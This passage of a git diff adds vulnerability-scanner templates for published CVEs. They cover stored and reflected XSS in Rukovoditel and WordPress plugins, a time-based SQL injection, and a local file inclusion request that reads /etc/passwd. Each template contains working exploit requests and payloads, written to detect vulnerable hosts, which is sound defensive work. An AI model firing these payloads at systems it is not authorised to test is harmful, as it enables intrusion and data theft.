+ cve-id: CVE-2022-44946 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml new file mode 100644 index 0000000000..0b0bce72f2 --- /dev/null +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44947 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/13 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44947 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=¬es=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml new file mode 100644 index 0000000000..a57e89e948 --- /dev/null +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44948 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/8 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44948 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml new file mode 100644 index 0000000000..e489ae03bd --- /dev/null +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -0,0 +1,128 @@ +id: CVE-2022-44949 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/12 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44949 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml new file mode 100644 index 0000000000..4688775a8f --- /dev/null +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -0,0 +1,128 @@ +id: CVE-2022-44950 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/10 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44950 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44950 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml new file mode 100644 index 0000000000..f6ced50538 --- /dev/null +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44951 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/11 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44951 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44951 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml new file mode 100644 index 0000000000..581ba7e576 --- /dev/null +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -0,0 +1,142 @@ +id: CVE-2022-44952 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/9 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44952 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NAME]" + + Test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" + + test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_LOGO"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_FAVICON"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FAVICON]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" + + english.php + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SKIN]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" + + America/New_York + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" + + 10 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" + + m/d/Y + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" + + m/d/Y H:i + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" + + 2/./* + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA-- + + - | + @timeout: 5s + GET /index.php?module=dashboard/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_4 == 200' + - 'contains(content_type_4, "text/html")' + - 'contains(body_4, "")' + - 'contains(body_4, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml new file mode 100644 index 0000000000..9cbdadc655 --- /dev/null +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-0514 + +info: + name: Membership Database <= 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05 + - https://wordpress.org/plugins/member-database/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0514 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-0514 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Member Database")' + condition: and diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml new file mode 100644 index 0000000000..8d9da20898 --- /dev/null +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-1730 + +info: + name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + remediation: Fixed in version 3.1.5 + reference: + - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 + - https://wordpress.org/plugins/supportcandy/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-1730 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "supportcandy")' + condition: and diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml new file mode 100644 index 0000000000..35d0e2d486 --- /dev/null +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-1835 + +info: + name: Ninja Forms < 3.6.22 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341 + - https://wordpress.org/plugins/ninja-forms/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1835 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1835 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Ninja Forms")' + condition: and diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml new file mode 100644 index 0000000000..ee72893fa9 --- /dev/null +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-1890 + +info: + name: Tablesome < 1.0.9 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d + - https://wordpress.org/plugins/tablesome/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1890 + remediation: Fixed in version 1.0.9. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1890 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "tablesome")' + condition: and diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml new file mode 100644 index 0000000000..7b89d30332 --- /dev/null +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-2023 + +info: + name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.7.3 + reference: + - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2023 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml new file mode 100644 index 0000000000..229a2214db --- /dev/null +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-2252 + +info: + name: Directorist < 7.5.4 - Local File Inclusion + author: r3Y3r53 + severity: medium + description: | + Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + remediation: Fixed in version 7.5.4 + reference: + - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 + - https://wordpress.org/plugins/directorist/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2252 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml new file mode 100644 index 0000000000..d61fec1bf7 --- /dev/null +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-2272 + +info: + name: Tiempo.com <= 0.1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e + - https://wordpress.org/plugins/tiempocom/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2272 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2272 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 